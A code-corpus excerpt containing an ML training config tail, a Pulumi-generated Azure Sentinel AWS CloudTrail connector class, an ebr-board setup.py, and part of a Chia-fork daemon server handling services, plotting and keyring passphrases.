'valid0': {
'func' : update_step.ActionUncertaintyValidatorWithReadouts,
'kwargs' : {},
'num_steps' : 500,
'online_agg_func' : online_agg_func,
'agg_func' : agg_func,
'data_params' : {
'func' : get_static_data_provider,
'batch_size' : args['batchsize'],
'batcher_constructor' : static_data.ObjectThereFixedPermutationBatcher,
'data_lengths' : data_lengths,
'capacity' : 5,
'metadata_filename' : OBJTHERE_TEST_METADATA_LOC,
'batcher_kwargs' : {
'seed' : 0,
'num_there_per_batch' : 16,
'num_not_there_per_batch' : 16,
'reset_batch_num' : 500
}
}
}
}
load_and_save_params = cfg_generation.query_gen_latent_save_params(location = 'freud', prefix = EXP_ID_PREFIX, state_desc = 'depths1', portnum = cfg_generation.NODE_5_PORT)
load_and_save_params['save_params']['save_to_gfs'] = ['batch', 'msg', 'recent', 'map_draw']
load_and_save_params['what_to_save_params']['big_save_keys'].extend(['um_loss1', 'um_loss2', 'um_loss0'])
load_and_save_params['what_to_save_params']['little_save_keys'].extend(['um_loss1', 'um_loss2', 'um_loss0'])
load_and_save_params['save_params']['save_metrics_freq'] = 20 if test_mode else 1000
postprocessor_params = {
'func' : train.get_experience_replay_postprocessor
}
params = {
'model_params' : model_params,
'data_params' : dp_config,
'postprocessor_params' : postprocessor_params,
'optimizer_params' : optimizer_params,
'learning_rate_params' : lr_params,
'train_params' : train_params,
'validate_params' : validate_params
}
params.update(load_and_save_params)
params['save_params']['save_valid_freq'] = 5 if test_mode else 10000
params['allow_growth'] = True
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = args['gpu']
train.train_from_params(**params)
| 31.504188 | 172 | 0.552797 |
| cf39867c5c57b98a5366e87677fdea97a7841664 | 15,314 | py | Python |
| sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null |
| sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null |
| sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | ["Apache-2.0"] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['AwsCloudTrailDataConnectorArgs', 'AwsCloudTrailDataConnector']
@pulumi.input_type
class AwsCloudTrailDataConnectorArgs:
def __init__(__self__, *,
data_types: pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs'],
kind: pulumi.Input[str],
operational_insights_resource_provider: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None):
"""
        The set of arguments for constructing an AwsCloudTrailDataConnector resource.
:param pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs'] data_types: The available data types for the connector.
:param pulumi.Input[str] kind: The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
:param pulumi.Input[str] operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] aws_role_arn: The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
:param pulumi.Input[str] data_connector_id: Connector ID
:param pulumi.Input[str] etag: Etag of the azure resource
"""
pulumi.set(__self__, "data_types", data_types)
pulumi.set(__self__, "kind", 'AmazonWebServicesCloudTrail')
pulumi.set(__self__, "operational_insights_resource_provider", operational_insights_resource_provider)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if aws_role_arn is not None:
pulumi.set(__self__, "aws_role_arn", aws_role_arn)
if data_connector_id is not None:
pulumi.set(__self__, "data_connector_id", data_connector_id)
if etag is not None:
pulumi.set(__self__, "etag", etag)
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs']:
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@data_types.setter
def data_types(self, value: pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs']):
pulumi.set(self, "data_types", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="operationalInsightsResourceProvider")
def operational_insights_resource_provider(self) -> pulumi.Input[str]:
"""
The namespace of workspaces resource provider- Microsoft.OperationalInsights.
"""
return pulumi.get(self, "operational_insights_resource_provider")
@operational_insights_resource_provider.setter
def operational_insights_resource_provider(self, value: pulumi.Input[str]):
pulumi.set(self, "operational_insights_resource_provider", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="awsRoleArn")
def aws_role_arn(self) -> Optional[pulumi.Input[str]]:
"""
The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
"""
return pulumi.get(self, "aws_role_arn")
@aws_role_arn.setter
def aws_role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "aws_role_arn", value)
@property
@pulumi.getter(name="dataConnectorId")
def data_connector_id(self) -> Optional[pulumi.Input[str]]:
"""
Connector ID
"""
return pulumi.get(self, "data_connector_id")
@data_connector_id.setter
def data_connector_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_connector_id", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
class AwsCloudTrailDataConnector(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
data_types: Optional[pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
operational_insights_resource_provider: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents Amazon Web Services CloudTrail data connector.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] aws_role_arn: The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
:param pulumi.Input[str] data_connector_id: Connector ID
:param pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']] data_types: The available data types for the connector.
:param pulumi.Input[str] etag: Etag of the azure resource
:param pulumi.Input[str] kind: The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
:param pulumi.Input[str] operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AwsCloudTrailDataConnectorArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents Amazon Web Services CloudTrail data connector.
:param str resource_name: The name of the resource.
:param AwsCloudTrailDataConnectorArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AwsCloudTrailDataConnectorArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
data_types: Optional[pulumi.Input[pulumi.InputType['AwsCloudTrailDataConnectorDataTypesArgs']]] = None,
etag: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
operational_insights_resource_provider: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AwsCloudTrailDataConnectorArgs.__new__(AwsCloudTrailDataConnectorArgs)
__props__.__dict__["aws_role_arn"] = aws_role_arn
__props__.__dict__["data_connector_id"] = data_connector_id
if data_types is None and not opts.urn:
raise TypeError("Missing required property 'data_types'")
__props__.__dict__["data_types"] = data_types
__props__.__dict__["etag"] = etag
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'AmazonWebServicesCloudTrail'
if operational_insights_resource_provider is None and not opts.urn:
raise TypeError("Missing required property 'operational_insights_resource_provider'")
__props__.__dict__["operational_insights_resource_provider"] = operational_insights_resource_provider
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:securityinsights/v20210301preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights/v20190101preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights/v20190101preview:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-native:securityinsights/v20200101:AwsCloudTrailDataConnector"), pulumi.Alias(type_="azure-nextgen:securityinsights/v20200101:AwsCloudTrailDataConnector")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(AwsCloudTrailDataConnector, __self__).__init__(
'azure-native:securityinsights/v20210301preview:AwsCloudTrailDataConnector',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'AwsCloudTrailDataConnector':
"""
Get an existing AwsCloudTrailDataConnector resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = AwsCloudTrailDataConnectorArgs.__new__(AwsCloudTrailDataConnectorArgs)
__props__.__dict__["aws_role_arn"] = None
__props__.__dict__["data_types"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return AwsCloudTrailDataConnector(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="awsRoleArn")
def aws_role_arn(self) -> pulumi.Output[Optional[str]]:
"""
The Aws Role Arn (with CloudTrailReadOnly policy) that is used to access the Aws account.
"""
return pulumi.get(self, "aws_role_arn")
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> pulumi.Output['outputs.AwsCloudTrailDataConnectorDataTypesResponse']:
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[Optional[str]]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Azure resource type
"""
return pulumi.get(self, "type")
| 45.987988 | 688 | 0.669845 |
| b38a438a40e0e069828d4a94d82975d93fe58b77 | 2,034 | py | Python |
| setup.py | eugene-davis/ebr-board | f592a752e17e869a6fd35ef82398f97748dbdc78 | ["Apache-2.0"] | null | null | null |
| setup.py | eugene-davis/ebr-board | f592a752e17e869a6fd35ef82398f97748dbdc78 | ["Apache-2.0"] | 4 | 2019-08-02T09:35:51.000Z | 2019-08-05T04:45:47.000Z |
| setup.py | LaudateCorpus1/ebr-board | f592a752e17e869a6fd35ef82398f97748dbdc78 | ["Apache-2.0"] | 1 | 2021-09-14T03:58:40.000Z | 2021-09-14T03:58:40.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from __future__ import with_statement
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup, find_packages
import ebr_board
with open("README.md") as readme_file:
readme = readme_file.read()
with open("CHANGELOG.md") as changelog_file:
changelog = changelog_file.read()
requirements = [
"ebr-connector>=0.1.4,<0.2",
"Flask>=1.1.0,<2",
"flask-restplus>=0.12.1,<0.13",
"pendulum>=2.0.5,<3",
"vault-anyconfig>=0.3.1,<0.4",
"PyYAML>=5.1,<6",
]
extras_require = {"aws_lambda": ["aws-wsgi>=0.2.0", "ssm-parameter-store>=19.5.0,<20.0.0"]}
# Ensure that linting and testing will be done with all dependencies installed
collected_extras = []
for req_set in extras_require.values():
collected_extras += req_set
setup_requirements = ["pytest-runner"] + collected_extras
test_requirements = ["pytest", "pytest-cov", "coverage"]
setup(
author=ebr_board.__author__,
author_email=ebr_board.__email__,
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
description="RESTful interface for Elastic Build Results.",
install_requires=requirements,
license="Apache Software License 2.0",
long_description=readme + "\n\n" + changelog,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="ebr_board",
name="ebr_board",
packages=find_packages(),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
extras_require=extras_require,
url="https://github.com/tomtom-international/ebr-board",
version=ebr_board.__version__,
zip_safe=False,
)
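# Usage note (illustrative): the aws_lambda extra declared above is installed with
# `pip install ".[aws_lambda]"`, while a plain `pip install .` pulls in only the base
# dependencies listed in `requirements`.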
| 28.647887 | 91 | 0.681416 |
| 48e4ec8f0bb24d3b7361383795691bf2f1009655 | 51,768 | py | Python |
| chia/daemon/server.py | Heather-Network/heather-blockchain | 75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa | ["Apache-2.0"] | 1 | 2021-09-19T18:57:21.000Z | 2021-09-19T18:57:21.000Z |
| chia/daemon/server.py | Heather-Network/heather-blockchain | 75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa | ["Apache-2.0"] | null | null | null |
| chia/daemon/server.py | Heather-Network/heather-blockchain | 75a37c6f54d98b5c36c5e8cf5b27c5ed9ae977fa | ["Apache-2.0"] | null | null | null |
import asyncio
import json
import logging
import os
import signal
import subprocess
import sys
import time
import traceback
import uuid
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
from pathlib import Path
from typing import Any, Dict, List, Optional, TextIO, Tuple, cast
from websockets import ConnectionClosedOK, WebSocketException, WebSocketServerProtocol, serve
from chia.cmds.init_funcs import check_keys, chia_init
from chia.cmds.passphrase_funcs import default_passphrase, using_default_passphrase
from chia.daemon.keychain_server import KeychainServer, keychain_commands
from chia.daemon.windows_signal import kill
from chia.server.server import ssl_context_for_root, ssl_context_for_server
from chia.ssl.create_ssl import get_mozilla_ca_crt
from chia.util.chia_logging import initialize_logging
from chia.util.config import load_config
from chia.util.json_util import dict_to_json_str
from chia.util.keychain import (
Keychain,
KeyringCurrentPassphraseIsInvalid,
KeyringRequiresMigration,
passphrase_requirements,
supports_keyring_passphrase,
supports_os_passphrase_storage,
)
from chia.util.path import mkdir
from chia.util.service_groups import validate_service
from chia.util.setproctitle import setproctitle
from chia.util.ws_message import WsRpcMessage, create_payload, format_response
io_pool_exc = ThreadPoolExecutor()
try:
from aiohttp import ClientSession, web
except ModuleNotFoundError:
print("Error: Make sure to run . ./activate from the project folder before starting heather.")
quit()
try:
import fcntl
has_fcntl = True
except ImportError:
has_fcntl = False
# log = logging.getLogger(__name__)
log = logging.getLogger("heather.daemon.server")
service_plotter = "heather plots create"
async def fetch(url: str):
async with ClientSession() as session:
try:
mozilla_root = get_mozilla_ca_crt()
ssl_context = ssl_context_for_root(mozilla_root, log=log)
response = await session.get(url, ssl=ssl_context)
if not response.ok:
log.warning("Response not OK.")
return None
return await response.text()
except Exception as e:
log.error(f"Exception while fetching {url}, exception: {e}")
return None
class PlotState(str, Enum):
SUBMITTED = "SUBMITTED"
RUNNING = "RUNNING"
REMOVING = "REMOVING"
FINISHED = "FINISHED"
class PlotEvent(str, Enum):
LOG_CHANGED = "log_changed"
STATE_CHANGED = "state_changed"
# determine if application is a script file or frozen exe
if getattr(sys, "frozen", False):
name_map = {
"heather": "chia",
"heather_wallet": "start_wallet",
"heather_full_node": "start_full_node",
"heather_harvester": "start_harvester",
"heather_farmer": "start_farmer",
"heather_introducer": "start_introducer",
"heather_timelord": "start_timelord",
"heather_timelord_launcher": "timelord_launcher",
"heather_full_node_simulator": "start_simulator",
}
def executable_for_service(service_name: str) -> str:
application_path = os.path.dirname(sys.executable)
if sys.platform == "win32" or sys.platform == "cygwin":
executable = name_map[service_name]
path = f"{application_path}/{executable}.exe"
return path
else:
path = f"{application_path}/{name_map[service_name]}"
return path
else:
application_path = os.path.dirname(__file__)
def executable_for_service(service_name: str) -> str:
return service_name
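# In a frozen (e.g. PyInstaller-style) build, executable_for_service maps a service name through
# name_map to a bundled executable next to sys.executable; when running from source it simply
# returns the service name for the subprocess layer to resolve.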
async def ping() -> Dict[str, Any]:
response = {"success": True, "value": "pong"}
return response
class WebSocketServer:
def __init__(
self,
root_path: Path,
ca_crt_path: Path,
ca_key_path: Path,
crt_path: Path,
key_path: Path,
run_check_keys_on_unlock: bool = False,
):
self.root_path = root_path
self.log = log
self.services: Dict = dict()
self.plots_queue: List[Dict] = []
self.connections: Dict[str, List[WebSocketServerProtocol]] = dict() # service_name : [WebSocket]
self.remote_address_map: Dict[WebSocketServerProtocol, str] = dict() # socket: service_name
self.ping_job: Optional[asyncio.Task] = None
self.net_config = load_config(root_path, "config.yaml")
self.self_hostname = self.net_config["self_hostname"]
self.daemon_port = self.net_config["daemon_port"]
self.daemon_max_message_size = self.net_config.get("daemon_max_message_size", 50 * 1000 * 1000)
self.websocket_server = None
self.ssl_context = ssl_context_for_server(ca_crt_path, ca_key_path, crt_path, key_path, log=self.log)
self.shut_down = False
self.keychain_server = KeychainServer()
self.run_check_keys_on_unlock = run_check_keys_on_unlock
async def start(self):
self.log.info("Starting Daemon Server")
def master_close_cb():
asyncio.create_task(self.stop())
try:
asyncio.get_running_loop().add_signal_handler(signal.SIGINT, master_close_cb)
asyncio.get_running_loop().add_signal_handler(signal.SIGTERM, master_close_cb)
except NotImplementedError:
self.log.info("Not implemented")
self.websocket_server = await serve(
self.safe_handle,
self.self_hostname,
self.daemon_port,
max_size=self.daemon_max_message_size,
ping_interval=500,
ping_timeout=300,
ssl=self.ssl_context,
)
self.log.info("Waiting Daemon WebSocketServer closure")
def cancel_task_safe(self, task: Optional[asyncio.Task]):
if task is not None:
try:
task.cancel()
except Exception as e:
self.log.error(f"Error while canceling task.{e} {task}")
async def stop(self) -> Dict[str, Any]:
self.shut_down = True
self.cancel_task_safe(self.ping_job)
await self.exit()
if self.websocket_server is not None:
self.websocket_server.close()
return {"success": True}
async def safe_handle(self, websocket: WebSocketServerProtocol, path: str):
service_name = ""
try:
async for message in websocket:
try:
decoded = json.loads(message)
if "data" not in decoded:
decoded["data"] = {}
response, sockets_to_use = await self.handle_message(websocket, decoded)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Error while handling message: {tb}")
error = {"success": False, "error": f"{e}"}
response = format_response(decoded, error)
sockets_to_use = []
if len(sockets_to_use) > 0:
for socket in sockets_to_use:
try:
await socket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
self.remove_connection(socket)
await socket.close()
except Exception as e:
tb = traceback.format_exc()
service_name = "Unknown"
if websocket in self.remote_address_map:
service_name = self.remote_address_map[websocket]
if isinstance(e, ConnectionClosedOK):
self.log.info(f"ConnectionClosedOk. Closing websocket with {service_name} {e}")
elif isinstance(e, WebSocketException):
self.log.info(f"Websocket exception. Closing websocket with {service_name} {e} {tb}")
else:
self.log.error(f"Unexpected exception in websocket: {e} {tb}")
finally:
self.remove_connection(websocket)
await websocket.close()
def remove_connection(self, websocket: WebSocketServerProtocol):
service_name = None
if websocket in self.remote_address_map:
service_name = self.remote_address_map[websocket]
self.remote_address_map.pop(websocket)
if service_name in self.connections:
after_removal = []
for connection in self.connections[service_name]:
if connection == websocket:
continue
else:
after_removal.append(connection)
self.connections[service_name] = after_removal
async def ping_task(self) -> None:
restart = True
await asyncio.sleep(30)
for remote_address, service_name in self.remote_address_map.items():
if service_name in self.connections:
sockets = self.connections[service_name]
for socket in sockets:
if socket.remote_address[1] == remote_address:
try:
self.log.info(f"About to ping: {service_name}")
await socket.ping()
except asyncio.CancelledError:
self.log.info("Ping task received Cancel")
restart = False
break
except Exception as e:
self.log.info(f"Ping error: {e}")
self.log.warning("Ping failed, connection closed.")
self.remove_connection(socket)
await socket.close()
if restart is True:
self.ping_job = asyncio.create_task(self.ping_task())
async def handle_message(
self, websocket: WebSocketServerProtocol, message: WsRpcMessage
) -> Tuple[Optional[str], List[Any]]:
"""
        This function gets called when a new message is received via the websocket.
"""
command = message["command"]
destination = message["destination"]
if destination != "daemon":
destination = message["destination"]
if destination in self.connections:
sockets = self.connections[destination]
return dict_to_json_str(message), sockets
return None, []
data = message["data"]
commands_with_data = [
"start_service",
"start_plotting",
"stop_plotting",
"stop_service",
"is_running",
"register_service",
]
if len(data) == 0 and command in commands_with_data:
response = {"success": False, "error": f'{command} requires "data"'}
# Keychain commands should be handled by KeychainServer
elif command in keychain_commands and supports_keyring_passphrase():
response = await self.keychain_server.handle_command(command, data)
elif command == "ping":
response = await ping()
elif command == "start_service":
response = await self.start_service(cast(Dict[str, Any], data))
elif command == "start_plotting":
response = await self.start_plotting(cast(Dict[str, Any], data))
elif command == "stop_plotting":
response = await self.stop_plotting(cast(Dict[str, Any], data))
elif command == "stop_service":
response = await self.stop_service(cast(Dict[str, Any], data))
elif command == "is_running":
response = await self.is_running(cast(Dict[str, Any], data))
elif command == "is_keyring_locked":
response = await self.is_keyring_locked()
elif command == "keyring_status":
response = await self.keyring_status()
elif command == "unlock_keyring":
response = await self.unlock_keyring(cast(Dict[str, Any], data))
elif command == "validate_keyring_passphrase":
response = await self.validate_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "migrate_keyring":
response = await self.migrate_keyring(cast(Dict[str, Any], data))
elif command == "set_keyring_passphrase":
response = await self.set_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "remove_keyring_passphrase":
response = await self.remove_keyring_passphrase(cast(Dict[str, Any], data))
elif command == "notify_keyring_migration_completed":
response = await self.notify_keyring_migration_completed(cast(Dict[str, Any], data))
elif command == "exit":
response = await self.stop()
elif command == "register_service":
response = await self.register_service(websocket, cast(Dict[str, Any], data))
elif command == "get_status":
response = self.get_status()
else:
self.log.error(f"UK>> {message}")
response = {"success": False, "error": f"unknown_command {command}"}
full_response = format_response(message, response)
return full_response, [websocket]
async def is_keyring_locked(self) -> Dict[str, Any]:
locked: bool = Keychain.is_keyring_locked()
response: Dict[str, Any] = {"success": True, "is_keyring_locked": locked}
return response
async def keyring_status(self) -> Dict[str, Any]:
passphrase_support_enabled: bool = supports_keyring_passphrase()
can_save_passphrase: bool = supports_os_passphrase_storage()
user_passphrase_is_set: bool = Keychain.has_master_passphrase() and not using_default_passphrase()
locked: bool = Keychain.is_keyring_locked()
needs_migration: bool = Keychain.needs_migration()
can_remove_legacy_keys: bool = False # Disabling GUI support for removing legacy keys post-migration
can_set_passphrase_hint: bool = True
passphrase_hint: str = Keychain.get_master_passphrase_hint() or ""
requirements: Dict[str, Any] = passphrase_requirements()
response: Dict[str, Any] = {
"success": True,
"is_keyring_locked": locked,
"passphrase_support_enabled": passphrase_support_enabled,
"can_save_passphrase": can_save_passphrase,
"user_passphrase_is_set": user_passphrase_is_set,
"needs_migration": needs_migration,
"can_remove_legacy_keys": can_remove_legacy_keys,
"can_set_passphrase_hint": can_set_passphrase_hint,
"passphrase_hint": passphrase_hint,
"passphrase_requirements": requirements,
}
return response
async def unlock_keyring(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
try:
if Keychain.master_passphrase_is_valid(key, force_reload=True):
Keychain.set_cached_master_passphrase(key)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
else:
error = "bad passphrase"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
if success and self.run_check_keys_on_unlock:
try:
self.log.info("Running check_keys now that the keyring is unlocked")
check_keys(self.root_path)
self.run_check_keys_on_unlock = False
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"check_keys failed after unlocking keyring: {e} {tb}")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def validate_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
try:
success = Keychain.master_passphrase_is_valid(key, force_reload=True)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def migrate_keyring(self, request: Dict[str, Any]) -> Dict[str, Any]:
if Keychain.needs_migration() is False:
# If the keyring has already been migrated, we'll raise an error to the client.
# The reason for raising an error is because the migration request has side-
# effects beyond copying keys from the legacy keyring to the new keyring. The
# request may have set a passphrase and indicated that keys should be cleaned
# from the legacy keyring. If we were to return early and indicate success,
# the client and user's expectations may not match reality (were my keys
# deleted from the legacy keyring? was my passphrase set?).
return {"success": False, "error": "migration not needed"}
success: bool = False
error: Optional[str] = None
passphrase: Optional[str] = request.get("passphrase", None)
passphrase_hint: Optional[str] = request.get("passphrase_hint", None)
save_passphrase: bool = request.get("save_passphrase", False)
cleanup_legacy_keyring: bool = request.get("cleanup_legacy_keyring", False)
if passphrase is not None and type(passphrase) is not str:
return {"success": False, "error": 'expected string value for "passphrase"'}
if passphrase_hint is not None and type(passphrase_hint) is not str:
return {"success": False, "error": 'expected string value for "passphrase_hint"'}
if not Keychain.passphrase_meets_requirements(passphrase):
return {"success": False, "error": "passphrase doesn't satisfy requirements"}
if type(cleanup_legacy_keyring) is not bool:
return {"success": False, "error": 'expected bool value for "cleanup_legacy_keyring"'}
try:
Keychain.migrate_legacy_keyring(
passphrase=passphrase,
passphrase_hint=passphrase_hint,
save_passphrase=save_passphrase,
cleanup_legacy_keyring=cleanup_legacy_keyring,
)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Legacy keyring migration failed: {e} {tb}")
error = f"keyring migration failed: {e}"
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def set_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
current_passphrase: Optional[str] = None
new_passphrase: Optional[str] = None
passphrase_hint: Optional[str] = request.get("passphrase_hint", None)
save_passphrase: bool = request.get("save_passphrase", False)
if using_default_passphrase():
current_passphrase = default_passphrase()
